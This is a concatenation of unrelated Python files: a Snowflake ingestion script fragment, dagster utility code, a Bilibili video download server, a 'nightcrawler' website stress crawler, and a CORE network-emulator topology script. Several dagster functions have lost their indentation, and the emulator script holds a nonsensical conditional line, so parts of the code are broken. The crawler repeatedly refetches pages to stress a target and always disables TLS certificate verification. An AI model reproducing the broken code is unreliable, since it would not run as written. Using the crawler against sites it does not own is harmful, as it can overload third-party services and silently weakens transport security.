    Returns:
        list of dict rows whose BATCH_NAME matches *batch* and whose
        JOB_ACTIVE_FLAG is 'Y'.
    """
    import csv
    rows = []
    # FIX: use a 'with' block so the file is closed even if a row raises;
    # the original open()/close() pair leaked the handle on error.
    with open(CONTROL_TABLE) as file:
        for row in csv.DictReader(file):
            # FIX: boolean 'and' instead of bitwise '&' -- same result on
            # bools but short-circuits and states the intent correctly.
            if row['BATCH_NAME'] == batch and row['JOB_ACTIVE_FLAG'] == 'Y':
                rows.append(row)
    return rows
def gridIterator(gridVariable,func):
    """Run *func* once per entry of *gridVariable*, each in its own process.

    All processes are created first, then started, then joined, so the jobs
    run concurrently. Returns 0 unconditionally.
    """
    workers = [
        multiprocessing.Process(target=func, args=(entry,))
        for entry in gridVariable
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    return 0
def initEnv(env,environmentVariables):
    """Connect to Snowflake for *env* and prime the shared ``ev`` state.

    Loads the JSON config at *environmentVariables*, stores the control-table
    path and the new cursor in the module-level ``ev`` dict, then runs the
    warehouse/db/schema USE statements. Returns the cursor.
    """
    # NOTE(review): the config file handle is never closed -- consider 'with'
    f = open(environmentVariables)
    envVar = json.load(f)
    ev["controlTable"]=str(envVar[env]["CONTROL_TABLE"])
    wh="USE WAREHOUSE "+str(envVar[env]["DEFAULT_WH"])
    dbSch="USE "+str(envVar[env]["DEFAULT_DB"])+"."+str(envVar[env]["DEFAULT_SCHEMA"])
    queries=['SELECT current_version()',wh,dbSch]
    sfSrc=ingestion.dbConnect(str(envVar[env]["CONFIG_FILE"]),str(envVar[env]["TGT_CON_NAME"]),logging=True,debug=False)
    cur=sfSrc.dbCursor
    # the cursor must be published to ev before executeMultiQuery reads it
    ev["cur"]=cur
    executeMultiQuery(queries)
    return cur
def mjEdlIngest(batch):
    """Ingest every active control-table job of *batch*, fanning the jobs
    out to one process each via gridIterator/FullDirectFile."""
    jobs = readControlTable(ev["controlTable"], batch)
    gridIterator(jobs, FullDirectFile)
import multiprocessing  # NOTE(review): duplicate of the top-of-file import; redundant
# batch='EVERY_MINUTE3'
# global cur
# NOTE(review): initEnv runs at import time, so merely importing this module
# opens a Snowflake connection -- confirm this side effect is intentional.
initEnv('APISERO',environmentVariables)
if __name__ == "__main__":
    # script entry point is currently a no-op; earlier invocations kept below
    # initEnv('DEV_AZURE_WEST',environmentVariables)
    # mjEdlIngest(batch)
    pass
    # while True:
    #     mjEdlIngest(batch,cur)
    #     sleep(50)
    # mjEdlIngest(batch)
    # gridIterator(gridVariable,FullDirectFile,sfSrc.dbCursor)
    # FullDirectFile(fileSourceType,fileSourceLocation,fileName,stageName,targetTable,targetSchema,targetDb,fileFormat,fileOptions,sfSrc.dbCursor,'Y')
    # sfSrc.dbCursor.execute("PUT 'file://D:/Workspace/Software Development/akash-adhikary/Projects/ETL/ETL-Ingestion-Framework/test_file.csv' @OYO.USERS.CONTACTS")
    # sfSrc.dbCursor.execute("copy into employee from '@contacts/test_file.csv.gz' file_format=DEMO_CONTACTS_CSV PURGE=TRUE")
    # print(sfSrc.dbCursor.fetchall())
|
__init__.py | import contextlib
import datetime
import errno
import functools
import inspect
import os
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check, seven
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, TemporaryDirectory, multiprocessing, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = "repository.yaml"
DEFAULT_WORKSPACE_YAML_FILENAME = "workspace.yaml"
def file_relative_path(dunderfile, relative_path):
    """Resolve *relative_path* against the directory containing *dunderfile*.

    Lets a module refer to files that sit next to its own source file,
    independent of the current working directory:

        file_relative_path(__file__, 'path/relative/to/file')
    """
    check.str_param(dunderfile, "dunderfile")
    check.str_param(relative_path, "relative_path")
    base_dir = os.path.dirname(dunderfile)
    return os.path.join(base_dir, relative_path)
def script_relative_path(file_path):
    """Return the absolute path of *file_path* relative to the calling script.

    Useful for tests that reference local fixture files. Note: very expensive
    (~1ms per call, it walks the interpreter stack); prefer file_relative_path
    in performance-sensitive code.
    """
    # from http://bit.ly/2snyC6s
    check.str_param(file_path, "file_path")
    caller_file = inspect.stack()[1][1]
    caller_dir = os.path.dirname(os.path.abspath(caller_file))
    return os.path.abspath(os.path.join(caller_dir, file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, "string")
string = re.sub(r"^[\-_\.]", "", str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r"[\-_\.\s]([a-z])", lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
    """Return the single (key, value) pair of *ddict*, asserting its size."""
    check.dict_param(ddict, "ddict")
    check.param_invariant(len(ddict) == 1, "ddict", "Expected dict with single item")
    (item,) = ddict.items()
    return item
@contextlib.contextmanager
def pushd(path):
    """Temporarily chdir into *path*, restoring the previous cwd on exit."""
    previous = os.getcwd()
    os.chdir(path)
    try:
        yield path
    finally:
        os.chdir(previous)
def safe_isfile(path):
    """os.path.isfile that returns False instead of raising ValueError.

    Backport of the Python 3.8 os.path behavior
    (https://docs.python.org/dev/whatsnew/3.8.html#os-path): paths containing
    e.g. a null byte raise ValueError deep inside os.path on older versions;
    swallow just that one error and report "not a file" rather than letting
    an unexpected ValueError escape from deep in our logic.
    """
    try:
        result = os.path.isfile(path)
    except ValueError:
        result = False
    return result
def mkdir_p(path):
    """``mkdir -p``: create *path* and parents, tolerating prior existence.

    Returns the path when it was created, None when it already existed.
    """
    try:
        os.makedirs(path)
    except OSError as exc:  # Python >2.5
        # re-raise anything that is not "already exists as a directory"
        if not (exc.errno == errno.EEXIST and os.path.isdir(path)):
            raise
    else:
        return path
class frozendict(dict):
    """An immutable dict: every mutating method raises RuntimeError."""
    def __readonly__(self, *args, **kwargs):
        raise RuntimeError("Cannot modify ReadOnlyDict")
    # https://docs.python.org/3/library/pickle.html#object.__reduce__
    #
    # For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
    # in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
    # override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
    # passed to __setstate__, allowing us to restore the frozendict.
    def __reduce__(self):
        return (frozendict, (), dict(self))
    def __setstate__(self, state):
        # rebuild contents through dict.__init__, which bypasses the blocked mutators
        self.__init__(state)
    # every mutating entry point shares the single raising implementation
    __setitem__ = __readonly__
    __delitem__ = __readonly__
    pop = __readonly__
    popitem = __readonly__
    clear = __readonly__
    update = __readonly__
    setdefault = __readonly__
    # drop the helper so it does not linger as a public method
    del __readonly__
class frozenlist(list):
    """An immutable list: every mutating method raises RuntimeError."""
    def __readonly__(self, *args, **kwargs):
        raise RuntimeError("Cannot modify ReadOnlyList")
    # every mutating entry point shares the single raising implementation
    # NOTE(review): unlike frozendict there is no __reduce__ override here,
    # so pickling may hit the blocked mutators -- confirm if pickling is needed
    __setitem__ = __readonly__
    __delitem__ = __readonly__
    append = __readonly__
    clear = __readonly__
    extend = __readonly__
    insert = __readonly__
    pop = __readonly__
    remove = __readonly__
    reverse = __readonly__
    sort = __readonly__
def make_readonly_value(value):
    """Recursively wrap lists/dicts as frozenlist/frozendict; other values
    pass through unchanged."""
    if isinstance(value, dict):
        return frozendict({k: make_readonly_value(v) for k, v in value.items()})
    if isinstance(value, list):
        return frozenlist([make_readonly_value(item) for item in value])
    return value
def get_prop_or_key(elem, key):
    """Fetch *key* from a mapping via .get, otherwise as an attribute."""
    if isinstance(elem, Mapping):
        return elem.get(key)
    return getattr(elem, key)
def list_pull(alist, key):
    """Project *key* out of every element of *alist* (mapping or object)."""
    return [get_prop_or_key(elem, key) for elem in alist]
def all_none(kwargs):
    """True iff every value in the dict *kwargs* is None (True when empty)."""
    return all(value is None for value in kwargs.values())
def check_script(path, return_code=0):
    """Run *path* with the current interpreter, expecting exit status
    *return_code*.

    A nonzero expectation that matches the actual failure code is swallowed;
    any other CalledProcessError is re-raised.
    """
    try:
        subprocess.check_output([sys.executable, path])
    except subprocess.CalledProcessError as exc:
        if return_code == 0 or exc.returncode != return_code:
            raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
    """Execute pipeline *pipeline_fn_name* from *path* through the dagster
    CLI, inside a throwaway test instance; re-raises on CLI failure."""
    from dagster.core.test_utils import instance_for_test
    command = [
        sys.executable,
        "-m",
        "dagster",
        "pipeline",
        "execute",
        "-f",
        path,
        "-a",
        pipeline_fn_name,
    ]
    if env_file:
        command += ["-c", env_file]
    with instance_for_test():
        try:
            subprocess.check_output(command)
        except subprocess.CalledProcessError as cpe:
            # surface the CLI output before propagating
            print(cpe)  # pylint: disable=print-call
            raise cpe
def safe_tempfile_path_unmanaged():
    """Return a fresh temporary-file path; the file itself is already gone.

    NamedTemporaryFile is closed (and therefore deleted) before returning,
    because on Windows NT+ an open NamedTemporaryFile cannot be opened a
    second time:
    https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
    https://github.com/dagster-io/dagster/issues/1582
    There is still no guarantee another process will not create a file at
    this path afterwards.
    """
    with tempfile.NamedTemporaryFile() as handle:
        name = handle.name
    return Path(name).as_posix()
@contextlib.contextmanager
def safe_tempfile_path():
    """Yield a temporary-file path, removing any file created there on exit."""
    try:
        tmp_path = safe_tempfile_path_unmanaged()
        yield tmp_path
    finally:
        if os.path.exists(tmp_path):
            os.unlink(tmp_path)
def ensure_gen(thing_or_gen):
    """Pass generators through unchanged; wrap any other value in a
    one-item generator."""
    if inspect.isgenerator(thing_or_gen):
        return thing_or_gen
    # generator expression keeps the return type a true generator
    return (item for item in (thing_or_gen,))
def ensure_dir(file_path):
    """Create directory *file_path* (and parents); an existing dir is fine."""
    try:
        os.makedirs(file_path)
    except OSError as err:
        if err.errno != errno.EEXIST:
            raise
def ensure_file(path):
    """Make sure *path* exists: create parent dirs, then touch if missing."""
    ensure_dir(os.path.dirname(path))
    if os.path.exists(path):
        return
    touch_file(path)
def touch_file(path):
    """Unix-style touch: ensure parents exist, then create *path* or bump
    its modification time."""
    ensure_dir(os.path.dirname(path))
    # open in append mode so existing contents are preserved
    with open(path, "a"):
        os.utime(path, None)
def _kill_on_event(termination_event):
    # Block (on a daemon thread) until the event is set, then interrupt the
    # main thread so the process can unwind.
    termination_event.wait()
    if IS_WINDOWS:
        # This will raise a KeyboardInterrupt in python land - meaning this wont be able to
        # interrupt things like sleep()
        thread.interrupt_main()
    else:
        # If on unix send an os level signal to interrupt any situation we may be stuck in
        os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
    """Spawn a daemon thread that interrupts this process once
    *termination_event* is set (see _kill_on_event above)."""
    check.inst_param(termination_event, "termination_event", ttype=type(multiprocessing.Event()))
    watcher = threading.Thread(
        name="kill-on-event", target=_kill_on_event, args=(termination_event,)
    )
    watcher.daemon = True
    watcher.start()
# Wraps code that we don't want a SIGINT to interrupt (but throw a KeyboardInterrupt if a
# SIGINT was received while it ran)
@contextlib.contextmanager
def delay_interrupts():
if not seven.is_main_thread():
yield
else:
original_signal_handler = signal.getsignal(signal.SIGINT)
received_interrupt = {"received": False}
def _new_signal_handler(signo, _):
check.invariant(signo == signal.SIGINT)
received_interrupt["received"] = True
signal.signal(signal.SIGINT, _new_signal_handler)
try:
yield
finally:
signal.signal(signal.SIGINT, original_signal_handler)
if received_interrupt["received"]:
raise KeyboardInterrupt
def datetime_as_float(dt):
    """Seconds since the Unix epoch for datetime *dt*, as a float."""
    check.inst_param(dt, "dt", datetime.datetime)
    elapsed = dt - EPOCH
    return float(elapsed.total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
    """Immutable, hashable str->str dict used for tags."""
    def __init__(self, *args, **kwargs):
        super(frozentags, self).__init__(*args, **kwargs)
        check.dict_param(self, "self", key_type=str, value_type=str)
    def __hash__(self):
        # order-insensitive: hash over the sorted item tuples
        return hash(tuple(sorted(self.items())))
    def updated_with(self, new_tags):
        """Return a new frozentags with *new_tags* merged over self."""
        check.dict_param(new_tags, "new_tags", key_type=str, value_type=str)
        merged = dict(self)
        merged.update(new_tags)
        return frozentags(merged)
class EventGenerationManager(object):
    """ Utility class that wraps an event generator function, that also yields a single instance of
    a typed object. All events yielded before the typed object are yielded through the method
    `generate_setup_events` and all events yielded after the typed object are yielded through the
    method `generate_teardown_events`.
    This is used to help replace the context managers used in pipeline initialization with
    generators so that we can begin emitting initialization events AND construct a pipeline context
    object, while managing explicit setup/teardown.
    This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
    get the typed object.
    """
    def __init__(self, generator, object_cls, require_object=True):
        # generator: event stream that yields exactly one object_cls instance
        # require_object: when True, exhausting the generator without seeing
        #     the typed object is treated as a failure
        self.generator = check.generator(generator)
        self.object_cls = check.type_param(object_cls, "object_cls")
        self.require_object = check.bool_param(require_object, "require_object")
        self.object = None
        self.did_setup = False
        self.did_teardown = False
    def generate_setup_events(self):
        # Yield events until the typed object appears; the object itself is
        # captured (not yielded) so callers retrieve it via get_object().
        self.did_setup = True
        try:
            while self.object is None:
                obj = next(self.generator)
                if isinstance(obj, self.object_cls):
                    self.object = obj
                else:
                    yield obj
        except StopIteration:
            # generator ended before producing the typed object
            if self.require_object:
                check.inst_param(
                    self.object,
                    "self.object",
                    self.object_cls,
                    "generator never yielded object of type {}".format(self.object_cls.__name__),
                )
    def get_object(self):
        # Only valid after generate_setup_events has been (fully) consumed.
        if not self.did_setup:
            check.failed("Called `get_object` before `generate_setup_events`")
        return self.object
    def generate_teardown_events(self):
        # Drain whatever the generator yields after the typed object.
        self.did_teardown = True
        if self.object:
            for event in self.generator:
                yield event
def utc_datetime_from_timestamp(timestamp):
    """Convert a POSIX *timestamp* to a timezone-aware UTC datetime.

    Uses datetime.timezone on Python >= 3.2 and falls back to pytz on
    older interpreters.
    """
    # BUG FIX: the previous test `major >= 3 and minor >= 2` misclassifies
    # versions such as 4.0/4.1 (and rejects nothing it should accept);
    # compare the version tuple directly instead.
    if sys.version_info >= (3, 2):
        from datetime import timezone
        tz = timezone.utc
    else:
        import pytz
        tz = pytz.utc
    return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
    """True iff *value* is an instance of an Enum subclass (None -> False)."""
    if value is None:
        return False
    return issubclass(value.__class__, Enum)
def git_repository_root():
    """Absolute path of the enclosing git repository's top-level directory."""
    output = subprocess.check_output(["git", "rev-parse", "--show-toplevel"])
    return six.ensure_str(output.strip())
def segfault():
    """Reliable cross-Python version segfault.
    https://bugs.python.org/issue1215#msg143236
    """
    from ctypes import string_at
    string_at(0)  # read from address 0 -> hard crash
def find_free_port():
    """Ask the OS for an ephemeral TCP port and return its number."""
    with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
        sock.bind(("", 0))
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        return sock.getsockname()[1]
@contextlib.contextmanager
def alter_sys_path(to_add, to_remove):
    """Temporarily drop *to_remove* from and prepend *to_add* to sys.path,
    restoring the original search path on exit."""
    snapshot = list(sys.path)
    for entry in to_remove:
        if entry in sys.path:
            sys.path.remove(entry)
    for entry in to_add:
        sys.path.insert(0, entry)
    try:
        yield
    finally:
        sys.path = snapshot
@contextlib.contextmanager
def restore_sys_modules():
    """On exit, evict any modules that were imported while the body ran."""
    snapshot = dict(sys.modules)
    try:
        yield
    finally:
        for name in set(sys.modules) - set(snapshot):
            del sys.modules[name]
def process_is_alive(pid):
    """True iff a process with id *pid* currently exists."""
    if IS_WINDOWS:
        import psutil  # pylint: disable=import-error
        return psutil.pid_exists(pid=pid)
    try:
        # on unix, `ps <pid>` exits 0 only when the pid exists
        subprocess.check_output(["ps", str(pid)])
    except subprocess.CalledProcessError as exc:
        assert exc.returncode == 1
        return False
    return True
def compose(*args):
    """
    Compose python functions args such that compose(f, g)(x) is equivalent to f(g(x)).
    """
    def _wrap(outer, inner):
        # one composition layer: apply inner first, then outer
        return lambda x: outer(inner(x))
    composed = lambda x: x  # identity: compose() is a no-op
    for fn in args:
        composed = _wrap(composed, fn)
    return composed
|
serve.py | import socket
import re
import threading
from k_load.extractors import Bilibili
class DownloadSite:
    '''
    A website for downloading Bilibili videos.

    Listens on 0.0.0.0:80 and hands each accepted connection to a Worker
    running on its own daemon thread. run() never returns.
    '''
    def _establish_socket(self):
        # Bind, listen, and dispatch connections forever.
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,0)
        self.sock.bind(('0.0.0.0', 80))
        self.sock.listen(10)
        self.client_pool = []
        while True:
            conn, addr = self.sock.accept()
            worker_thread = threading.Thread(target=Worker, args=(conn, ))
            # FIX: Thread.setDaemon() is deprecated (removed in Python 3.13);
            # assign the .daemon property instead -- same semantics.
            worker_thread.daemon = True
            worker_thread.start()
            # NOTE(review): this list grows without bound (finished threads
            # are never pruned) -- consider dropping or cleaning it.
            self.client_pool.append(worker_thread)
    def run(self):
        '''
        entry point
        '''
        self._establish_socket()
class Worker:
    # Handles one accepted connection end-to-end: parses the request line,
    # resolves the Bilibili video and streams it back as an attachment.
    # The whole request/response cycle runs inside __init__, so the class
    # is usable directly as a Thread target.
    base_url = 'https://www.bilibili.com'
    def __init__(self, conn):
        # conn: an accepted client socket
        self.conn = conn
        self._process()
    def _send_header(self, params):
        # Write a fixed "200 OK" status line plus the given header fields.
        head = 'HTTP/1.1 200 OK\r\n'
        for p in params:
            head += '%s: %s\r\n' % (p, str(params[p]))
        head += '\r\n'
        self.conn.send(head.encode())
    def _process(self):
        # Read the request. NOTE(review): a recv() shorter than 1024 bytes is
        # taken to mean the request is complete; a request arriving in exact
        # 1024-byte chunks would keep this loop reading -- confirm acceptable.
        buffer = b''
        while True:
            pack = self.conn.recv(1024)
            if pack is None or len(pack) < 1024:
                buffer += pack
                break
            buffer += pack
        req_header = buffer.decode()
        re_url = self._parse_url(req_header)
        if not re_url:
            # not a /video/avNNN path: answer with a plain error body
            error_msg = 'params error'
            res_header = self._send_header({'Content-Length': len(error_msg)})
            self.conn.send(error_msg.encode())
        else:
            # resolve the video, then stream it as an attachment download
            obj = self._get_k_load_res(re_url.group())
            res_header = self._send_header({'Access-Control-Allow-Origin': '*',
                                            'Content-Range': 'bytes',
                                            'Content-Type': 'video/x-flv',
                                            'Content-Length': obj.size,
                                            'Content-Disposition': 'attachment; filename="%s.flv"' % obj.name})
            self._send_file(obj)
        self.conn.close()
    def _parse_url(self, req_header):
        # Extract the request path from the first request line.
        try:
            aid = req_header.split('\r\n')[0].split(' ')[1]
        except:
            return False
        # only /video/av<digits> paths are accepted
        return re.match(r'\/video\/av\d+', aid)
    def _get_k_load_res(self, url):
        # Build and parse the extractor for the full video URL.
        obj = Bilibili(**{'url': self.base_url+url})
        obj.parse()
        return obj
    def _send_file(self, vid_obj):
        # Stream the video resource to the client in 256 KiB chunks,
        # swallowing client-side disconnects.
        pack_size = 2**18
        while True:
            buffer = vid_obj.resource_res.read(pack_size)
            if not buffer:
                try:
                    self.conn.send(buffer)
                except:
                    pass
                break
            try:
                self.conn.send(buffer)
            except:
                pass
# Instantiate and start the blocking HTTP server at import time
# (binds port 80 and loops forever).
app = DownloadSite()
app.run()
|
nightcrawler.py | #!/usr/bin/env python
# Nightcrawler - a web site offensive crawler
# https://www.freecodecamp.org/news/how-to-build-a-url-crawler-to-map-a-website-using-python-6a287be1da11/
# https://github.com/ahadsheriff/map-website/blob/master/map_website.py
import warnings
import requests.exceptions
import requests
import argparse
import sys
import coloredlogs, logging
from threading import Thread
from logging.handlers import WatchedFileHandler
from atpbar import atpbar
from collections import deque
from bs4 import BeautifulSoup
from urllib.parse import urlsplit
from urllib.parse import urlparse
__version__="0.1"
FORMATTER = logging.Formatter("%(asctime)s - [%(threadName)s] — %(name)s — %(levelname)s — %(message)s")
LOG_FILE = "nightcrawler.log"
def get_console_handler():
    """Build a stream handler writing formatted records to stdout."""
    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(FORMATTER)
    return handler
def get_file_handler():
    """Build a WatchedFileHandler on LOG_FILE (tolerates log rotation)."""
    handler = WatchedFileHandler(LOG_FILE)
    handler.setFormatter(FORMATTER)
    return handler
def get_logger(logger_name):
    """Build a DEBUG-level logger with console and watched-file handlers."""
    logger = logging.getLogger(logger_name)
    logger.setLevel(logging.DEBUG)  # better too much log than not enough
    for handler in (get_console_handler(), get_file_handler()):
        logger.addHandler(handler)
    # handlers are attached here, so records should not also bubble up
    # to the root logger
    logger.propagate = False
    return logger
def crawler(url: str, ofile: str, count:int, form_pollution:bool, ignore_cert:bool, name:str) -> int:
    '''
    Crawl and pollute website
    Args:
        url (str): this is the starting point for the crawler.
        ofile (str): this is the optional report filename. If nil, only standard output will be used.
        count (int): each discovered url will be fetched 'count' times. This can be useful if we want to stress the endpoint. Default set to 1.
        form_pollution (bool): if set to True, the crawler will try to submit FORMs with bogus data. Default set to False.
        ignore_cert (bool): if set to True, the crawler won't check the SSL certificate. Default set to True
        name (str): label shown on this worker's atpbar progress bar.
    Returns:
        crawler: the number of discovered URLs
    '''
    try:
        new_urls = deque([url])
        processed_urls = set()
        local_urls = set()
        foreign_urls = set()
        broken_urls = set()
        s = requests.Session()
        # NOTE(review): certificate verification is always disabled here; the
        # ignore_cert argument is never consulted -- confirm intent.
        s.verify=False
        while len(new_urls):
            url = new_urls.popleft()
            processed_urls.add(url)
            my_logger.info("Processing %s" % url)
            # for x in range(0, count):
            # fetch the page 'count' times (stress mode) with a progress bar
            for x in atpbar(range(0, count), name=name):
                my_logger.debug(".")
                try:
                    with warnings.catch_warnings():
                        warnings.simplefilter("ignore")
                        response = s.get(url)
                except(requests.exceptions.MissingSchema, requests.exceptions.ConnectionError, requests.exceptions.InvalidURL, requests.exceptions.InvalidSchema) as e:
                    broken_urls.add(url)
                    my_logger.warning(url+" added to broken url")
                    my_logger.warning(str(e))
                    continue
            # NOTE(review): if every fetch of the first url failed, 'response'
            # is unbound below and raises NameError -- confirm acceptable.
            parts = urlsplit(url)
            base = "{0.netloc}".format(parts)
            strip_base = base.replace("www.", "")
            base_url = "{0.scheme}://{0.netloc}".format(parts)
            path = url[:url.rfind('/')+1] if '/' in parts.path else url
            soup = BeautifulSoup(response.text, "lxml")
            for link in soup.find_all('a'): # extract link url from the anchor
                anchor = link.attrs["href"] if "href" in link.attrs else ''
                if anchor.startswith('//'):
                    # protocol-relative link: reuse the current scheme
                    local_link = "{0.scheme}:".format(parts) + anchor
                    local_urls.add(local_link)
                elif anchor.startswith('/'):
                    # absolute path on the same host
                    local_link = base_url + anchor
                    local_urls.add(local_link)
                elif strip_base in anchor:
                    # full url that mentions our host
                    local_urls.add(anchor)
                elif not anchor.startswith('http'):
                    # relative link: resolve against the current directory
                    local_link = path + anchor
                    local_urls.add(local_link)
                else:
                    foreign_urls.add(anchor)
            # queue any newly discovered local urls for crawling
            for i in local_urls:
                if not i in new_urls and not i in processed_urls:
                    new_urls.append(i)
    except KeyboardInterrupt:
        sys.exit()
    return len(local_urls)
def main(argv):
    '''
    This is THE main

    Args:
        argv(Array): the command line (everything after the program name)
    Returns:
        main(int): returns 0 if everything worked as expected or -1 in case of errors
    '''
    text="A python program that crawls a website and tries to stress it, polluting forms with bogus data"
    parser = argparse.ArgumentParser(prog='nightcrawler', description=text, usage='%(prog)s [options]', epilog="Please make sure you're allowed to crawler and stress target website.")
    parser.add_argument('--url', '-u', required=True, help='the url you want to start to crawl from')
    parser.add_argument('--count', '-c', type=int, default=1, help='the number of times the crawler will get every url')
    parser.add_argument('--threads', '-t', type=int, default=1, help='the number of concurrents thread. Useful to stress test the website')
    parser.add_argument('--form-pollution', dest='pollution', action='store_true', help="pollute forms with bogus data")
    parser.add_argument('--no-form-pollution', dest='pollution', action='store_false', help="be fair with forms and not submit any data")
    parser.add_argument('--verbose', '-V', dest='verbose', action='store_true', help="be verbose")
    parser.set_defaults(pollution=False)
    parser.set_defaults(verbose=False)
    parser.add_argument('--version', action='version', version='%(prog)s {version}'.format(version=__version__))
    # BUG FIX: the argv parameter was accepted but ignored -- parse_args()
    # silently fell back to sys.argv. Pass it through explicitly so callers
    # (and tests) can supply their own command line.
    args = parser.parse_args(argv)
    url = args.url
    count = args.count
    pollution = args.pollution
    t = args.threads
    if args.verbose:
        my_logger.setLevel(logging.DEBUG)
    my_logger.debug(count)
    # one crawler thread per requested worker, all starting at the same url
    threads = []
    for ii in range(0, t):
        name='thread {}'.format(ii)
        process=Thread(target=crawler, args=[url, None, count, pollution, True, name])
        process.daemon = True
        process.start()
        threads.append(process)
    for process in threads:
        process.join()
    #crawler(url, None, count, pollution, True)
if __name__ == "__main__":
    # bootstrap the module-level logger used by crawler()/main()
    # NOTE(review): the logger name is misspelled ("nigthcrawler") -- kept
    # as-is since it is a runtime string
    my_logger=get_logger("nigthcrawler")
    my_logger.setLevel(logging.INFO)
    coloredlogs.install()
    main(sys.argv[1:])
|
asymmetric.py | #!/usr/bin/python3
#
# run iperf to measure the effective throughput between two nodes when
# n nodes are connected to a virtual wlan; run test for testsec
# and repeat for minnodes <= n <= maxnodes with a step size of
# nodestep
import threading, sys, time, random, os, traceback, playsound,json
import rest, socket
import parser
import logging
from builtins import range
from core import load_logging_config
from core.emulator.coreemu import CoreEmu
from core.emulator.emudata import IpPrefixes, NodeOptions
from core.emulator.enumerations import NodeTypes, EventTypes
from core.location.mobility import BasicRangeModel
from core import constants
load_logging_config()
nodes_to_send = []
class Auxiliar:
    """Simulation helper: tracks how many per-node report files have been
    written under *path*, until every mote in *motes* has produced one."""
    def __init__(self, path, motes):
        self.motes = motes
        self.path = path
        self.nodesfinished = 0  # report files seen so far
    def random_walk(self,motes):
        """Jitter every mote's position by up to +/-6 in both axes."""
        for mote in motes:
            current = mote.getposition()
            dx = random.randint(-6, 6)
            dy = random.randint(-6, 6)
            mote.setposition(current[0] + dx, current[1] + dy)
    def check_finished(self):
        """Return False once every mote has a report file, else True.

        Logs whenever the count of finished nodes grows.
        """
        filenames = []
        for _dirpath, _dirnames, names in os.walk(self.path):
            filenames.extend(names)
            break  # only the top-level directory counts
        if len(filenames) >= len(self.motes):
            print('should be finished')
            return False
        if len(filenames) > self.nodesfinished:
            self.nodesfinished = len(filenames)
            logging.info(str(self.nodesfinished) + " nodes finished")
        return True
def topology(tmax=10, protocol='eagp', time_mul=0.1, simul_max=20000):
    """Build and run a 19-mote WLAN simulation in the CORE emulator.

    Args:
        tmax: forwarded to the mote launcher script (run.sh) as a string.
        protocol: routing/gossip protocol name passed to run.sh.
        time_mul: simulation time multiplier passed to run.sh.
        simul_max: maximum number of simulation steps passed to run.sh.
    """
    global nodes_to_send  # snapshot polled by the send_nodes() server thread
    radius = 120  # WLAN basic-range model radius
    # Topology name given to run.sh, derived from this script's filename.
    topofile = (os.path.basename(__file__)).split('.')[0]
    motes = []
    # Initial battery percentage per mote, indexed by mote number.
    # NOTE(review): 30 values but only 19 motes are created below.
    battery = [
        '99', '89', '87', '95', '99',
        '78', '87', '94', '96', '78',
        '86', '94', '93', '96', '94',
        '88', '84', '99', '79', '82',
        '99', '69', '89', '96', '92',
        '95', '92', '91', '96', '87'
    ]
    # ip generator for example
    prefixes = IpPrefixes("10.0.0.0/24")
    # create emulator instance for creating sessions and utility methods
    coreemu = CoreEmu()
    session = coreemu.create_session()
    # must be in configuration state for nodes to start, when using "node_add" below
    session.set_state(EventTypes.CONFIGURATION_STATE)
    # create wlan network node
    wlan = session.add_node(_type=NodeTypes.WIRELESS_LAN)
    session.mobility.set_model(wlan, BasicRangeModel, config={'range': radius, 'bandwidth': 54000000, 'jitter': 0, 'delay': 5000, 'error': 0})
    session.mobility.get_models(wlan)
    # create nodes, must set a position for wlan basic range model
    node_options = []
    for i in range(0, 19):
        node_options.append(NodeOptions(name='mote' + str(i)))
    # Fixed (x, y) layout for each mote.
    node_options[0].set_position(75, 127)
    node_options[1].set_position(175, 124)
    node_options[2].set_position(72, 224)
    node_options[3].set_position(177, 224)
    node_options[4].set_position(127, 37)
    node_options[5].set_position(125, 322)
    node_options[6].set_position(191, 387)
    node_options[7].set_position(273, 316)
    node_options[8].set_position(340, 396)
    node_options[9].set_position(393, 311)
    node_options[10].set_position(452, 397)
    node_options[11].set_position(501, 352)
    node_options[12].set_position(551, 301)
    node_options[13].set_position(502, 252)
    node_options[14].set_position(551, 199) if False else node_options[13].set_position(502, 252)
    node_options[14].set_position(603, 251)
    node_options[15].set_position(602, 352)
    node_options[16].set_position(327, 222)
    node_options[17].set_position(551, 199)
    node_options[18].set_position(551, 400)
    # adding the nodes
    for node_opt in node_options:
        motes.append(session.add_node(node_options=node_opt))
    # configuring links: every mote attaches to the shared WLAN node
    for mote in motes:
        interface = prefixes.create_interface(mote)
        session.add_link(mote.id, wlan.id, interface_one=interface)
    # instantiate session
    #session.save_xml('teste.xml')
